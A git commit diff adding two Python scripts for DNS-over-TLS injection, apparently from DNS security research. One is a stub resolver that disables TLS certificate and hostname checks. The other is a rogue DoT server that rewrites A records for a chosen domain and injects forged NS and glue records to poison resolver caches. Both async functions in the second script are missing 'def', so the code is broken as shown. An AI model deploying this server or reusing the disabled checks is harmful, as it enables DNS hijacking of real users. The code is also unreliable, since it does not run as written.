first commit

11_dot_injection/dot_stub.py

@@ -0,0 +1,45 @@
+import socket
+import ssl
+import dns.message
+import dns.query
+import dns.rcode
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-dot', '--dot', default='dns.alidns.com')
+args = parser.parse_args()
+print(f'DoT server: {args.dot}')
+upstream_server = '47.88.31.213'
+
+# 创建监听socket
+listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+listener.bind(('127.0.0.1', 53))
+
+# 创建TLS连接
+context = ssl.create_default_context()
+context.check_hostname = False
+context.verify_mode = ssl.CERT_NONE
+while True:
+        # 接收DNS请求
+    data, addr = listener.recvfrom(1024)
+    #print(dns.message.from_wire(data))
+    data = dns.message.from_wire(data)
+    if 'baidu' in data.question.__str__():
+        # print(data)
+        # print(addr)
+        print('DNS请求：', data.question)
+        # # 创建TLS连接并发送DNS请求到上游服务器
+        resp = dns.query.tls(
+            q=data,
+            where=upstream_server,
+            timeout=10,
+            ssl_context=context)
+        print('DNS响应：', resp.answer)
+        # with socket.create_connection((upstream_server,853)) as sock:
+        #     with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
+        #         tls_sock.sendall(data.to_wire())
+        #         resp = tls_sock.recv(4096)
+
+        # 将上游服务器的响应发送回客户端
+        listener.sendto(resp.to_wire(), addr)
+        break

11_dot_injection/fake_DoT.py

@@ -0,0 +1,63 @@
+import argparse
+import asyncio
+import ssl
+import socket
+import dns.asyncquery
+import dns.message
+import dns.rcode
+import dns.flags
+import dns.message
+import dns.rrset
+from dnslib import DNSRecord
+
+async handle_client(reader, writer):
+    request_data = await reader.read(1024)
+    request =  dns.message.from_wire(request_data[2:])
+    #print(request)
+    dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
+    dns_request.id = request.id
+    #print(dns_request)
+    dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
+    #print(dns_response)
+    if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
+        print('---tamper---', tamper)
+        dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
+    if str(request.question[0].name) == inject:
+        print('---inject---', inject)
+        dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+                                   dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+    #print(dns_response)
+
+    response_data = dns_response
+    record_header = len(response_data.to_wire()).to_bytes(2, 'big')
+    # 构建完整的TLS响应数据
+    tls_response_data = record_header + response_data.to_wire()
+    writer.write(tls_response_data)
+    await writer.drain()
+    writer.close()
+
+async start_server():
+    # 配置服务器参数
+    listen_address = '0.0.0.0'
+    listen_port = 853
+    CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"  # 替换为你的SSL证书文件路径
+    KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"  # 替换为你的SSL密钥文件路径
+    context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+    context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
+    # 创建TCP服务器
+    server = await asyncio.start_server(
+        handle_client, listen_address, listen_port, ssl=context)
+
+    print(f'DoT server listening on {listen_address}:{listen_port}')
+    async with server:
+        await server.serve_forever()
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+asyncio.run(start_server())